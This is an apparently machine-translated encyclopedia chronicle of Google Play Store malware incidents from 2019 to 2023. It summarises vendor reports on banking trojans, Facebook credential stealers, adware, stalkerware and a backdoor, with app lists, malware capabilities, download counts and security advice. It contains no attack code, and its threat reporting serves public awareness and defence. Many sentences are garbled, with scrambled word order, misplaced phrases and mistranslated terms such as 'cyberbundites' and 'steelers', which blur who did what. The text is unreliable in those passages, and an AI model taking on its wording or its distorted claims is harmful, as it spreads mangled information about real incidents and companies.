App security in the Google Play Store

The main articles are:

• Google Play Store
• Android security
• Software Security (SW)

2023

The Mammoth version has become known, where scammers offer to make purchases using a spy virus

On October 9, 2023, the company F.A.C.C. T announced a version of the Mammoth fraudulent scheme that uses the fake store. Google Play Under the pretext of processing the delivery of goods, the scammers ask the victim to download and install from the fake ad service store mobile application , under which the spy service is disguised. Androidtrojan Virus helps attackers quietly write off money from the victim's account - the average theft amount is 67,000. rubles

In the classic Mammoth scheme, fraudsters steal money data bank cards from victims under the pretext of making a fake purchase and delivering goods from marketplaces, renting, real estate and traveling together. At to data the end of the summer of 2023 Russia , 17 active criminal groups worked under the Mammoth scheme.

In September 2023, Digital Risk Protection specialists from F.A.C.C.T. discovered the Mammoth fraudulent community, which uses Android Trojans in its attacks. In this scheme - and this is its main danger - attackers do not require entering bank card data on a phishing site, but offer to install a mobile application for a delivery ad service. The spy program hidden in it is capable of intercepting the entered bank card data and incoming SMS codes to steal money from the accounts of customers of Russian banks.

The scheme itself works as follows: workmen (community members who attract victims to download a malicious application) create fake advertisements for the sale of goods in a special Telegram bot and at the output receive a link to download a mobile application - an APK file.

When a buyer is found and he is ready to pay for the goods, the scammers convince the victim to continue the conversation in the messenger so that the resource with the ads does not block the message with a link to the malicious program, and download a mobile application with which it is allegedly already possible to arrange delivery. The whole legend of the cook is based on the fact that he is allegedly an individual entrepreneur, and to buy goods with delivery, most often these are popular electronics, clothes, shoes, his clients need to use a special program.

After clicking on the victim's link, a fake Google Play page opens, from which you need to download and install a mobile application that quite accurately copies the design and functionality of real online platforms. This is where the buyer needs to issue delivery. At the time of payment, the mobile Trojan intercepts and sends to the member of the criminal group - the driver - the entered data of the victim's bank card, and then incoming SMS with a transfer confirmation code to steal money from the victim's account.

According to the F.A.C.C.T., bank customers in both Russia and Belarus suffered from the actions of fraudsters in September 2023. In 10 days in September, using fake applications, attackers were able to steal almost 3,000,000 rubles according to the updated Mammoth scheme, making 76 write-offs.

Old tricks sooner or later stop bringing the desired income to the scammers, and then they come up with new scenarios, decoys, change mechanics, "said Evgeny Egorov, a leading analyst at the Digital Risk Protection department of F.A.C.C.T. - We saw how fraudsters used phishing pages generated by Telegram bots in the Mammoth scheme, then they began to infect victims with steelers who stole password logins. In October 2023, one of the groups began to use mobile Trojans. Some users may decide that mobile applications similar to well-known services, as if from an official store, are unlikely to hide the danger - this is what the attackers rely on.

Crypto-ransomware apps infiltrate official Google and Apple stores

On February 2, 2023, it became known that cyberbundites from Tinder lure gullible men into a cruel financial trap. The creators of high-yield investment scams called "The Pig-Butchering Scum" have found a way to bypass store protection. applications Google Play Apple App Store More. here

2022

Harly is another Trojan subscriber on Google Play

Kaspersky Lab researchers have reported a new Harly Trojan active since 2020. According to the report, at least 190 applications are infected with malware, which have a total of 4.8 million downloads. However, there may be many more victims. This became known on September 27, 2022. Read more here.

SharkBot 2.25 returns to Google Play

An updated version malware of SharkBot returned to Google the Play Store. The malware targets bank data users who install seemingly harmless ones that applications are actually droppers for SharkBot. This became known on September 7, 2022.

According to a blog post by Fox IT, a division of the NCC Group, the two malicious apps are "Mister Phone Cleaner" and "Kylhavy Mobile Security," which together have 60,000 downloads. And while the two apps have been removed from Google Play, users who installed them are still at risk.

On August 22, 2022, researchers from Fox IT discovered an updated version of SharkBot (2.25), which allows using to malefactors the "logsCookie" command to steal session - cookiefiles when the victim enters bank account systems.

According to experts, in older versions, the dropper installs SharkBot by clicking on the buttons in the user interface. However, the updated version of the dropper for SharkBot makes a request to the attackers' C&C server to get the malware APK file.

Illustration: securitylab.ru

As soon as the APK file was downloaded to the victim's device, the dropper notifies the user of the update and calls for the downloaded file to be installed and then provide all the necessary permissions.

To complicate detection, SharkBot stores its configuration encrypted using the RC4 algorithm.

During the investigation, Fox IT IT specialists discovered that a malicious campaign using SharkBot was aimed at Spain, Austria, Germany, Poland, as well as the United States. Experts expect there to be even more campaigns using SharkBot, as the updated version of the malware is actively distributed among cybercriminals^[1].

Two million users targeted by malicious apps on Google Play

Two million users were victims of the next set harmful applications Google on Play. The apps were discovered by researchers from, Bitdefender who used a real-world behavior analysis method. time This became known on August 19, 2022.

Illustration: securitylab.ru

According to experts, the tactics of the operators of the detected applications were standard:

• The victim is deceived by passing off a malicious application as a useful tool;
• Immediately after installation, the malware changes the icon and name to make search difficult;
• The application begins to show intrusive ads to users using WebView. The profit received from advertising shows goes to cybercriminals.

Experts note that all detected applications use their own framework to download ads, so there is a possibility that in addition to ads, attackers can start downloading additional malicious to victims' devices. ON

To prevent the user from quickly finding and removing malicious applications, they install a gear icon in place of the icons and rename themselves to 'Settings'. If the victim clicks on the icon, it will be transferred to the current settings menu. To remain even more secretive, malicious applications remove themselves from the recently opened list.

In addition, malware is characterized by extremely strong code obfuscation and encryption, which does not allow reverse engineering.

The list of the most famous applications (with more than 100,000 downloads) looks like this:

• Walls light – Wallpapers Pack (gb.packlivewalls.fournatewren);
• Big Emoji – Keyboard 5.0 (gb.blindthirty.funkeyfour);
• Grand Wallpapers – 3D Backdrops 2.0 (gb.convenientsoftfiftyreal.threeborder);
• Engine Wallpapers (gb.helectronsoftforty.comlivefour);
• Stock Wallpapers (gb.fiftysubstantiated.wallsfour);
• EffectMania – Photo Editor 2.0 (gb.actualfifty.sevenelegantvideo);
• Art Filter – Deep Photoeffect 2.0 (gb.crediblefifty.editconvincingeight);
• Fast Emoji Keyboard APK (de.eightylamocenko.editioneights);
• Create Sticker for Whatsapp 2.0 (gb.convincingmomentumeightyverified.realgamequicksix);
• Math Solver – Camera Helper 2.0 (gb.labcamerathirty.mathcamera);
• Photopix Effects – Art Filter 2.0 (gb.mega.sixtyeffectcameravideo);
• Led Theme – Colorful Keyboard 2.0 (gb.theme.twentythreetheme);
• Animated Sticker Master 1.0 (am.asm.master);
• Sleep Sounds 1.0 (com.voice.sleep.sounds);
• Personality Charging Show 1.0 (com.charging.show);
• Image Warp Camera;
• GPS Location Finder (smart.ggps.lockakt).

Earlier it was reported about another set of malicious applications distributed on Google Play. Seemingly harmless, various photo editors virtual keyboards wallpaper tools and editors hid malicious and adware^[2] to^[3]

Dozens of malware distribution apps removed from Google Play again

Dozens of applications that distribute malware have been removed from Google Play again. This became known on July 19, 2022.

Researchers at Zscaler ThreatLabz were most interested in the spread of the infamous Joker malware targeting Android devices. Despite all of Google's security systems, the malware still continues to enter the app store using new signatures, launch methods and updated code for this.

Joker belongs to the class of malicious applications that are used for billing and SMS fraud. In addition, the malware collects SMS messages, contact lists and information about the device.

This time, experts found 53 applications infected with Joker. More than 300,000 users are known to have downloaded them. According to the researchers, most malicious ON applications infected are divided into two categories: communication (47%) and tools (39%). Attackers try to mask infected apps by using logos similar to icons of famous messengers and tools to trick as many victims as possible.

In addition to Joker, experts found two other malware in the applications:

• FaceStealer is an information dealer used to steal accounts Facebook (recognized by extremist the organization and prohibited in). Russia With it hackers , they collected the accounts of victims data , offering them login in the application through a fake Facebook window.
• Coper - masquerading bank trojan as a scanner. QR codes He is engaged in keylogging, knows how to intercept and send SMS messages, and also allows attackers to gain full control over the device. Its purpose is the victim's cash.

Experts once again warn users that even Google Play has malicious applications and recommend carefully studying reviews of applications before installing^[4].

Over 2.7 million users are victims of an unknown malware family

On July 14, 2022, it became known that over 2.7 million users were victims of Autolycos malware, which was discovered by Evina information security specialist Maxim Ingrao in 8 applications on Google Play.

As of July 2022, all malicious applications have been removed from the app store.

Below is a list of malicious applications and their number of downloads:

• Vlog Star Video Editor - 1 million downloads;
• Creative 3D Launcher - 1 million downloads;
• Funny Camera - 500,000 downloads;
• Wow Beauty Camera - 100,000 downloads;
• Gif Emoji Keyboard - 100,000 downloads;
• Razer Keyboard & Theme - 50,000 downloads;
• Freeglow Camera 1.0.0 - 5,000 downloads;
• Coco Camera v1.1 - 1,000 downloads.

And although Ingrao reported them in June 2021, Google removed malicious applications only 6 months after the specialist's message.

Once in the victim's system, Autolycos launches against the background, trying to stay unnoticed. For example, the malware begins to navigate various URLs in a remote browser, and then includes the result in HTTP requests, replacing Webview. In addition, when installed on the device, Autolycos requests permission to read SMS messages.

It is known that ON Autolycos operators launched numerous advertizing campaigns in to promote their applications with malware. social networks For Razer Keyboard & Theme alone, Ingrao counted 74 advertising campaigns in (Facebook recognized as an extremist organization and banned in) Russia Over^[5]

More than 200 Android apps from Google Play distribute Facestealer spyware

More than 200 Android-applications Google spyware ON Facestealer is distributed from Play. This became known on May 18, 2022.

Of the 200 applications, 42 are disguised as VPN services, 20 as video editors and 13 as photo editors.

Like Joker, which is another mobile, malware Facestealer often changes its code, generating many variants. Since its discovery, espionage ON has been constantly besieging Google Play, experts said INFORMATION SECURITY. Trend Micro

In addition to accounts data , they also steal cookies files Facebook (recognized by the extremist organization and prohibited in) Russia and those associated with the accounts of victims personally. identified information

In addition, Trend Micro has discovered 40 malicious cryptominers that force users to watch ads and pay for subscriptions.

Some fake cryptocurrency apps, such as Cryptomining Farm Your own Coin, have gone even further and are trying to steal private keys and mnemonic phrases used to restore access to cryptocurrency wallets^[6].

Adding a Data Security Section

On April 28, 2022, it became known that Google another section will appear on Play - "Security." In data it, any user will be able to see which personal information one he receives, application what data he collects and transmits. After that, a person can decide whether to continue using this service. Also, the Data Security section will indicate whether the app complies with Google Play's family policy.

Filling out the form and providing a link to privacy policy is mandatory for all developers, including those who do not collect any user data, Google said.

As Google representatives said, for providing incorrect information about the collection of personal data, the application is threatened with blocking and deleting^[7] from the Play Store^[8].

2021

Dr.Web found malicious applications in the Google Play directory

On July 1, 2021, the company Dr.Web"" announced that it had discovered Google applications in the Play directory harmful that steal logins passwords and users. Facebook These - trojans stilers were distributed under the guise of harmless programs, the total number of installations of which exceeded 5,856,010.

Virus analysts "Dr.Web" found malicious applications in the Google Play catalog

According to the company, a total of 10 such Trojan applications have been identified by experts. 9 of them were present on Google Play at the time of discovery:

• photo editor called Processing Photo (detected by Dr.Web as Android.PWS.Facebook.13). It was distributed by the developer chikumburahamilton, and it was installed more than 500,000 times.
• App Lock Keep applications from developer Sheralaw Rence, App Lock Manager from developer Implummet col and Lockit Master from developer Enali mchicolo (detected as Android.PWS.Facebook.13), which allow you to configure restrictions on access to Android devices and software installed on them. They were loaded at least 50,000, 10 and 5,000 times and respectively.
• utility for optimizing the operation of Android devices Ruby Cleaner from the developer SNT.rbcl with more than 100,000 downloads (detected as Android.PWS.Facebook.13).
• astrological programs Horoscope Daily from the developer HscopeDaily momo and Horoscope Pi from the developer Talleyr Shauna (detected as Android.PWS.Facebook.13). The first was installed over 100,000 times, the second ― more than 1,000 times.
• fitness program Inwell Fitness (detected as Android.PWS.Facebook.14) from the developer Reuben Germaine, which was installed over 100,000 times.
• image editor PIP Photo, which was distributed by developer Lillians. Different versions of this program are detected as Android.PWS.Facebook.17 and Android.PWS.Facebook.18. This application ― more than 5,000,000 downloads.

After Dr.Web specialists contacted Google, some of these malicious programs were removed from Google Play, but as of July 2021, some were still available for download.

In addition, when studying these steelers, their earlier modification was discovered, distributed through Google Play under the guise of the EditorPhotoPip photo editor program and already removed from the catalog, but still available on application aggregator sites. It was added to the Dr.Web virus database as Android.PWS.Facebook.15. Android.PWS.Facebook.13, Android.PWS.Facebook.14 and Android.PWS.Facebook.15 are native Android applications, and Android.PWS.Facebook.17 and Android.PWS.Facebook.18 use the Flutter framework for cross-platform development. Despite this, they can be considered modifications of one Trojan, since they use the same configuration file format and the same JavaScript scripts to steal data.

The applications were fully functional, which was supposed to weaken the vigilance of potential victims. At the same time, to access all their functions, as well as allegedly to disable ads, users were invited to log into their Facebook account. Advertising inside some programs was indeed present, and this technique was intended to further encourage owners of Android devices to perform the action they needed.

At the same time, the form shown was real. The fact is that the Trojans used a special mechanism to deceive their victims. Having received the necessary settings from one of the control servers after launch, they uploaded the legitimate page of the social network Facebook facebook.com/login.php to WebView. The same WebView was loaded with JavaScript received from the attacker's server, which directly intercepted the authorization data entered. Then this JavaScript, using methods provided through the JavascriptInterface annotation, transmitted the stolen username and password to Trojan applications, after which they sent them to the attacker's server. After the victim logged into his account, the Trojans additionally stole the cookies of the current authorization session, which were also sent to cybercriminals.

Analysis of these malware programs showed that they all received settings to steal logins and passwords from Facebook accounts. However, attackers could easily change their parameters and instruct them to download the page of any other legitimate service, or even use a completely fake login form posted on a phishing site. Thus, Trojans could be used to steal logins and passwords from absolutely any service. The Android.PWS.Facebook.15 malware, which is an earlier modification, is identical to the rest, but it additionally contains data output to the log in Chinese, which may indicate its possible origin.

Doctor Web recommends that Android device owners install applications only from well-known and trusted developers, as well as pay attention to feedback from other users. Recalls do not give an absolute guarantee of safety, but they can signal a potential threat. In addition, pay attention to when and what programs require the user to log into the account of any service. If the user is not sure about the security of the actions, you should refuse to continue and remove the suspicious program.

Wave of fraudulent applications recorded for users from Southwest Asia and the Arabian Peninsula

Another wave of fraudulent apps has infiltrated the Google Play store, targeting Android users in Southwest Asia and the Arabian Peninsula - there were already more than 700,000 downloads before the McAfee Mobile Research team discovered them, and began removing them with Google. McAfee announced this on April 30, 2021.

^{Fig. 1. Infected apps on Google Play}

Malware is built into photo editors, wallpapers, puzzles, keyboard shells and other applications. Malware intercepts SMS notifications and then makes unauthorized purchases. Legal applications go through the verification process before getting to Google Play, and fraudulent applications hit the store, sending a "clean" version of the application for verification, and malicious code is injected there after the update.

^{Figure 2. Negative reviews on Google Play}

McAfee Mobile Security defines this threat as Android/Etinu and warns mobile users that there is a threat when using this application. The McAfee Mobile Research team continues to monitor this threat, and is working with Google to remove these and other malicious apps from Google Play.

The malware built into these applications ON uses dynamic code loading. Encrypted data malware appear in a folder associated with an application named "cache.bin," "settings.bin," "data.droid," or harmless.png files, as shown below.

^{Figure 3. Decryption process}

The figure above shows the decryption process. First, the hidden malicious code in the main.apk application opens the "1.png" file in the assets folder, decrypts it into "loader.dex," and then downloads the modified.dex. "1.png" is encrypted using RC4 with the packet name as the key. The first payload creates an HTTP POST request to the C2 server.

Interestingly, this malware uses key management servers. It queries the servers for keys, and the server returns the key as "s" JSON. Also, this malware has a self-renewal function. When the server responds with "URL," the URL content is used instead of "2.png." However, servers do not always respond to a request or return a secret key.

^{Figure 4. Updated payload response}

As always, the most malicious functions appear at the final stage. The malware hijacks the notification listener to steal incoming SMS messages, as the Android Joker malware does, without permission to read SMS. As a chain, the malware then sends the notification object to the final stage. When the notification comes from the default SMS package, the message is finally sent using the JavaScript WebView interface.

^{Figure 5. Notification Delivery Scheme}

The researchers came to the conclusion that fraudsters could receive information about the user's communication operator, phone number, SMS messages, IP address, country, etc.

^{Figure 6. Data breach}

McAfee expects threats that use the notification listening feature to continue to evolve. The McAfee Mobile Research team continues to monitor these threats and protect customers by analyzing potential malware and working with app stores to remove them. However, it is important to pay special attention to applications that request permissions related to SMS and listening to notifications. Real apps to process photos or install wallpapers simply won't ask for them because they aren't needed to run them.

Avast detected fraudulent apps on Google Play

On March 25, 2021, Avast, a representative in the field of digital security and protection solutions, announced the discovery of more than 200 fleeceware applications in the App Store and Google Play. Read more here.

Detection of malware that allows access to banking applications

On March 12, 2021 Check Point , it announced that its Check Point Research division had discovered a Google dropper in the Play Store - malware created to deliver another malicious to the ON victim's device. "Clast82," as the researchers called it, launches, malware which allows to the hacker access to the victim bank to applications and full control. smartphone The researchers found Clast82 in 10 "useful" apps, such as those with a function or VPN screen recordings.

Clast82 installs the AlienBot Banker banking Trojan on the victim's smartphone, which can bypass two-factor authentication of banking applications. The Clast82 is also equipped with a mobile remote access Trojan (MRAT), which allows you to download applications and control the victim's smartphone through TeamViewer.

How Clast82 uses third-party resources to bypass Google's security mechanisms:

• Firebase (Google service) as a platform for communication with C&C (command server). During the Clast82 test period on Google Play, the hacker changed the configuration on the control and control side using Firebase, and then "disabled" the malicious behavior of the Clast82 while checking the application from Google.
• GitHub as a third-party hosting platform for downloading useful data. To publish each application on Google Play, the hacker created a new developer account and repository in the GitHub account, which allowed him to distribute data to devices with malicious applications installed.

10 appendices containing Clast82

On January 28, 2021, Check Point Research researchers reported the Google find. On February 9, the company confirmed that all apps infected with Clast82 have been removed from Google Play.

The method that the hacker chose is very inventive, but raises great concerns for us: the attacker managed to bypass the security mechanisms of Google Play using publicly available third-party resources, in this case the GitHub and FireBase accounts. The victims were confident they were downloading useful apps from the official Android store, but instead got a dangerous Trojan targeting banking apps, says Aviran Hazum, a mobile threat researcher at Check Point. - Mechanisms for stealthily bypassing security systems that use malware prove the need to install additional solutions to protect mobile devices. Regular in-store app validation is not enough because an attacker can easily change malware behavior using third-party resources.

2020

Not all applications have fixed the vulnerability CVE-2020-8913

Check Point Software Technologies researchers have confirmed that applications in the Google Play Store are still exposed to a known vulnerability CVE-2020-8913 which means that hundreds of millions of Android users are at significant risk. This became known on December 4, 2020. The breach was first reported in late August by Oversecured researchers. Using it, an attacker can inject malicious code into vulnerable applications, giving access to the resources of the host application. As a result, a hacker can gain access to confidential data from other applications on the device.

The issue is rooted in the Play Core library used, which allows developers to download updates and add function modules to Android apps. The vulnerability makes it possible to add executable modules to any applications that use the library. If an attacker gains access to one malicious application on the victim's device, then he can then steal her personal information: logins, passwords, financial data, letters in the mail.

Developers need to update applications as quickly as possible

Google admitted and corrected the error on April 6, 2020, awarding it 8.8 points out of 10 in severity. However, in order to completely eliminate the threat, developers had to implement the patch in their applications. Check Point researchers randomly selected several apps to see who actually implemented the fix provided by Google.

Researchers find vulnerable apps

During September 2020, 13% of Google Play applications out of all those analyzed by Check Point specialists used the Play Core library. At the same time, 8% of them had vulnerable versions. These Android apps were still vulnerable:

• Viber

• Booking

• Cisco Teams

• Yango Pro (taxometer), Moovit (Maps and Navigation)
• Grindr, OKCupid, Bumble (dating apps)
• Edge (browser)
• Xrecorder, PowerDirector (utilities)

The researchers notified all applications of the vulnerability and the need to update the library version. Further tests revealed Viber and Booking had made the necessary corrections following a notice to Check Point.

We estimate that hundreds of millions of Android users are at risk, "says Aviran Hazum, mobile research manager at Check Point Software Technologies. - While Google has implemented the patch, many apps still use legacy Play Core libraries. The vulnerability is CVE-2020-8913 very dangerous. If a malicious application exploits this flaw, it can access the same data as the vulnerable program. If a cybercriminal injects code into social media applications, he will be able to spy on victims if he enters the code into instant messengers - he will gain access to all messages. The possibilities of attack here are limited only by the imagination of intruders.

The corresponding CVE-2020-8913 vulnerability does not exist in the latest versions of Play Core.

Avast: HiddenAds Trojan found on Google Play Store in 47 apps that mimic games

On June 26, 2020, it became known that Avast, a company in the field of digital security and security solutions, discovered 47 game applications in the Google Play Store that are part of the HiddenAds family of Trojans.

Avast has already informed Google Play Store representatives about the found applications, but as of June 26, 2020, some applications are still available in the Google Play store. Google's investigation into these apps is ongoing. Applications in the HiddenAds family of Trojans masquerade as secure and useful applications - but actually place intrusive ads outside of applications. In total, the applications found were downloaded more than 15 million times.

The Avast team was able to detect this campaign using automatic apklab.io detection software, based on a previous HiddenAds campaign recently found on the Google Play Store. The researchers compared the activities, features and network traffic of these applications.

Such applications can hide their icons on an infected device and intrusively display ads - this is a key feature of the HiddenAds family of Trojans. Seven apps can open a browser on a smartphone to display additional ads. Even when a user uninstalls an app from their device, ads will still be constantly shown. Apps have low gaming capabilities and low ratings, with users complaining about constant advertising.

{{quote "Campaigns such as HiddenAds can enter the official Google Play Store by hiding their true purpose or slowly implementing malicious functions while already downloaded to the device. Such advertising campaigns are difficult to prevent, since attackers use one-time developer accounts for each application, "says Yakub Vavra, threat analyst at Avast. - While Google is a trusted store and regularly removes malicious apps, users still need to remain vigilant. When downloading applications to your devices, it is important to look so that there are no obvious signs of a bad application - for example, negative reviews, requests for a large number of permissions, and much more. }}

Below are the 20 most downloaded apps:

• Draw Color by Number - 1,000,000
• Skate Board - New - 1,000,000
• Find Hidden Differences - 1,000,000
• Shoot Master - 1,000,000
• Stacking Guys - 1,000,000
• Disc Go! - 1,000,000
• Spot Hidden Differences - 500,000
• Dancing Run - Color Ball Run - 500,000
• Find 5 Differences - 500,000
• Joy Woodworker - 500,000
• Throw Master - 500,000
• Throw into Space - 500,000
• Divide it - Cut & Slice Game - 500,000
• Tony Shoot - NEW - 500,000
• Assassin Legend - 500,000
• Flip King - 500,000
• Save Your Boy - 500,000
• Assassin Hunter - 2020 500,000
• Stealing Run - 500,000
• Fly Skater 2020 - 500,000

Trojan found creating fake app reviews on Google Play

On January 10, 2020, the company Kaspersky Lab"" announced the discovery, with the Trojan help malefactors advertizing applications fake reviews Google of which numerous ads are distributed and, without the knowledge of the owners, various devices are installed on their devices, and also left on Play on their behalf. More. here

Removing more than 1,700 applications infected with Bread malware

On January 10, 2020, it became known that specialists from the company Google spoke about their successful operation to combat harmful ON Bread, also known as Joker. Over the past three years, the company has removed more than 1,700 applications in Play Store that have been infected with various versions of this malware.

As reported, while most malware operators give up as soon as Google detects their apps, Bread operators have continued to operate. For more than three years, attackers have been releasing updated versions of their programs every week.

At one point, criminals used almost every technique of disguise and circumvention, protection trying to go unnoticed. At different times, we found three or more active variants of the malware using different approaches or targeted for different carriers. During the peak periods of the activity of criminals, we saw up to 23 different applications of this family on Google Play in one day. Google reported on its blog

According to experts, the attackers actively exploited the vulnerability in Google Play in order to bypass the protective mechanisms. A tactic called "versioning" allowed you to download a clean version of the application, and only then add malicious functions by updating the program.

Criminals have also often used YouTube videos to direct users to malicious apps in an attempt to infect as many devices as possible. Malware operators also used fake reviews to increase the popularity of apps and hide negative reviews.

The original versions of the Bread malware were targeted at fraud using - SMS messages, where infected devices were used to pay for products or services by sending an SMS message to a paid number.

When Google introduced stricter permissions for Android apps requiring access to SMS on the device, criminals changed tack and switched to WAP scams, in which infected devices were used to connect to payment pages via a WAP connection.^[9]

2019

About 90% of Russian popular Android applications transfer personal data to third parties

On October 2, 2019, it became known that Internet publishing The Bell using the AppCensus service and the Exodus application privacy audit platform analyzed which data ones are processed and transmitted by popular ones - in the Androidapplications Russian Google Play Store, as well as what permissions they request from users. More. here

Avast: 937 flashlight apps abuse access to personal data

On September 10, 2019, it was reported Avast that the company found applications that for flashlights OS Android , an average of 25 permissions are requested for access to different features and. Avast to data smartphones analyzed 937 flashlight apps in the Play Store using its mobile proprietary apklab.io threat analysis Google platform. The researchers looked at both those apps that are still available on the Google Play Store and those that have ever appeared in the store. According to the results, 408 applications request up to 10 permissions, 267 from 11 to 49 permissions, and 262 applications request 50 to 77 permissions.

Applications can indeed ask for permissions to access data or some features on the devices they need to work. For example, a flashlight app needs access to a phone flash to use as a backlight. However, many applications request access to more data than they really need.

The meaning of some of the permissions requested by the flashlight apps we studied is really hard to explain. For example, sound recording, which was requested by 77 applications, or a contact list, which for some reason 180 applications need. The most unusual thing on this list is the ability to record contacts: 21 flashlight apps wanted to get it. The flashlight apps we reviewed are just an example of how even the simplest apps can access private information. Often, personal data is accessed not only by application developers, but also by advertisers with whom they work to monetize this information. Developer privacy policies are unfortunately not exhaustive, as in many cases third party privacy policies are closely intertwined,

It's not very clear how to flag apps that ask for a lot of permissions - just as harmful or as potentially dangerous. Apps can actually ask smartphone for access to a wide variety of features or data - but that doesn't mean the app is malicious.

In addition, the user decides for himself whether to give access to a particular function or not. Therefore, it is imperative that users carefully check the permissions requested by the application before installing it. In addition, users should carefully read the privacy policy and terms, as well as user feedback on the application download page.

Almost 102 million Android users have installed a clicker Trojan from the Google Play catalog

On August 8, 2019, Dr.Web reported that almost 102 000 000 Android users have installed a clicker Trojan from the Google Play catalog. Read more here.

Avast specialists discovered seven spy apps in the Google Play Store

On July 18, 2019, it became known that researchers from the Department of Threat Research and Protection for Mobile Devices Avast found Google seven applications in the Play Store that were probably created by the Russian developers. Applications allow you to follow colleagues and relatives.

Avast specialists immediately reported applications, including Spy Tracker, Employee Work Spy and SMS Tracker, to Google. The company promptly removed all applications from the Google Play Store.

Collectively, these apps have been downloaded more than 130,000 times. The largest number of installations came from Spy Tracker and SMS Tracker - they were installed more than 50,000 times.

All applications require that a person who wants to follow their loved ones and colleagues have access to the victim's device. The malicious application must be downloaded from the Google Play Store to the device being monitored. You will need to enter your email password - the application will send a password to access the received data.

After you have installed the first application and configured it, it will download another program itself. Then the first application can be removed - the victim will not see the spy ON installed on it. smartphone

The detected malicious applications could track the victim's location, collect her contacts, SMS and call history. On some devices, WhatsApp and Viber messages could be accessed.

Full list of detected spyware applications:

• Track Employees Check Work Phone Online Spy Free
• Spy Kids Tracker
• Phone Cell Tracker
• Mobile Tracking
• Spy Tracker
• SMS Tracker
• Employee Work Spy

Using applications of this type is unethical to others. Such programs create big problems for the privacy of people, and they should not appear in the Google Play Store, as they promote criminal behavior. Employers, parents or spouses, having received private information, can abuse it. Some of these apps position themselves as parental control apps, but their descriptions tell a different story. We classify applications such as stalkerware - spyware. With the apklab.io Analytics Platform, we can quickly identify them and share that information with Google to remove them,

Backdoor Trojan disguises itself as OpenGL ES GUI update software

On July 12, 2019, Doctor Web announced that it had identified a backdoor Trojan on Google Play that executes attackers' commands, allows them to remotely control infected Android devices and spy on users.

According to the company, the malware was named Android.Backdoor.736.origin. It is distributed under the guise of the OpenGL Plugin application to check the version of the OpenGL ES GUI and download its updates.

When launched, the Android.Backdoor.736.origin requests access to several important system permissions that will allow it to collect sensitive information and work with the file system. In addition, it tries to get permission to display screen forms on top of the interface of other programs.

The malicious application window has a button for "checking" updates to the OpenGL ES graphical software interface. After pressing it, the Trojan simulates the process of searching for updated versions of OpenGL ES, but in fact it does not perform any checks and only misleads the user.

After the victim closes the application window, the Android.Backdoor.736.origin removes its icon from the list of programs in the main screen menu and creates a shortcut to its launch. This is done to make it more difficult for the user to remove the Trojan in the future, since removing the shortcut will not affect the malware itself.

Android.Backdoor.736.origin is constantly active in the background and can be launched not only through an icon or shortcut, but also automatically when the system starts and at the command of attackers through Firebase Cloud Messaging. The main malicious functionality of the Trojan is located in an auxiliary file, which is encrypted and stored in a directory with program resources. It stands for and is loaded into memory at each Android.Backdoor.736.origin start.

The backdoor communicates with several control servers, from where it receives attacker commands and where it sends the collected data. In addition, cybercriminals can control the Trojan through the Firebase Cloud Messaging service.

Android.Backdoor.736.origin is capable of the following actions:

• transfer contact information from the phone book to the server;
• transfer information about SMS messages to the server (in the investigated version of the Trojan, there are no necessary permissions for this);
• Send telephone call information to the server.
• transmit device location information to the server;
• Download and run an apk or dex file using the DexClassLoader class.
• transfer information about installed programs to the server;
• download and run the executable file;
• Download the file from the server.
• send the specified file to the server;
• transfer to the server information about files in the specified directory or about files on the memory card;
• Execute a shell command.
• Start the activity specified in the command.
• download and install the Android application;
• Show the notification specified in the command.
• request the permission specified in the command;
• Send a list of permissions granted to the Trojan to the server.
• prevent the device from going to sleep for a given time.

The Trojan encrypts all data transmitted to the server with the AES algorithm. Each request is protected by a unique key, which is generated taking into account the current time. The same key encrypts the server response.

Android.Backdoor.736.origin is able to install applications in several ways at once:

• Automatically if the system has root access (using the shell command)
• With the System Package Manager (System Software only)
• showing the standard system dialog for installing programs, where the user must agree to the installation.

Thus, this backdoor poses a serious danger. It is not only engaged in cyber espionage, but can also be used for phishing, since it is able to show windows and notifications with any content. In addition, it can download and install any other malicious applications, as well as execute arbitrary code. For example, at the command of cybercriminals, the Android.Backdoor.736.origin can download and run an exploit to obtain root privileges, the field of which he no longer needs the user's participation to install other programs.

Doctor Web notified Google of the Trojan, and it has already been removed from Google Play for July 2019.

Apps published in the Play Store will be manually checked

On April 17, 2019, it became known that Google made changes to the Play Store security policies, thanks to which developers of malicious Android applications will no longer be able to publish their products in the store. In particular, Google has imposed restrictions on the Android API, and now, before publication in the Play Store, each application must undergo a complex security check and test.

Other improvements include checking applications by people, not automated tools. In addition, developers can no longer abuse Android accessibility services, and restrictions have been imposed on applications to gain access to some services, such as call logs and SMS.

Earlier, Google has already added a scanner to its store that searches for malware based on app activity. Other measures to strengthen the protection of the Play Store include the launch of a reward program for discovered vulnerabilities, etc.

The process of checking applications added to the Play Store from new developers without a history of publishing trusted applications has become faster and will now take days, not weeks.

Although most Android app developers are bona fide, some accounts are still blocked for serious systematic violations of security policies. Although in more than 99% of cases the decision to block is correct, we are very concerned about the consequences that blocking can cause by mistake, according to the Google blog.

From now on, the owners of mistakenly blocked accounts can immediately appeal, and the Android team will carefully consider it. If during the verification process it turns out that the account was blocked by mistake, it will be restored^[10].

Special type of advertising malware found in 206 applications

On March 14, 2019, it became known that Check Point Research researchers discovered a malicious campaign Google in the Play store. A special variety advertizing malware was found in 206 applications, and the total number of downloads reached almost 150 million. Google was quickly notified and removed infected apps from the Google Play store. Check Point named this malware SimBad, as most of the infected applications are simulation games.

The functionality of SimBad can be divided into three groups: displaying ads, phishing and accessing other applications. Thanks to the ability to open a given URL in a browser, an attacker hiding behind SimBad can create phishing pages for several platforms and open them in a browser, thereby launching phishing attacks on the user.

Thanks to the ability to malware open app stores such as Google Play and 9Apps, an attacker can install a remote app from a designated one. servers So he can install malicious at any time ON and increase his profit.

Once a user downloads and installs one of the infected applications, SimBad registers itself in the BOOT_COMPLETE and USER_PRESENT manifestos, allowing SimBad to perform actions after the device finishes downloading and while the user uses their device respectively.

After installation, the malware connects to the specified command server to perform certain actions. SimBad has extensive capabilities, such as removing an icon from the launchpad, making it harder for the user to delete it, run background ads, and open a browser with a given URL.

The command server seen in this campaign is addroider.com. This server runs an instance of Parse Server (source code on) GitHub , the open source version of the Parse Backend infrastructure, which is a model that allows web application developers mobile applications to link their applications to back end cloudy storage and API back end interfaces provided by background applications, as well as features such as user management, push notifications, and more.

Domain addroider.com has been registered through hosting GoDaddy and uses privacy protection. When you access the domain from the browser, you get a login page that is very similar to other malware panels. Registration links "Register" and "Sign Up" do not work and "redirect" the user back to the login page.

According to RiskIQ analysis, the domain expired 7 months ago. As a result, you may be looking at a compromised, assigned domain that was originally used legally but is now involved in malicious activity.

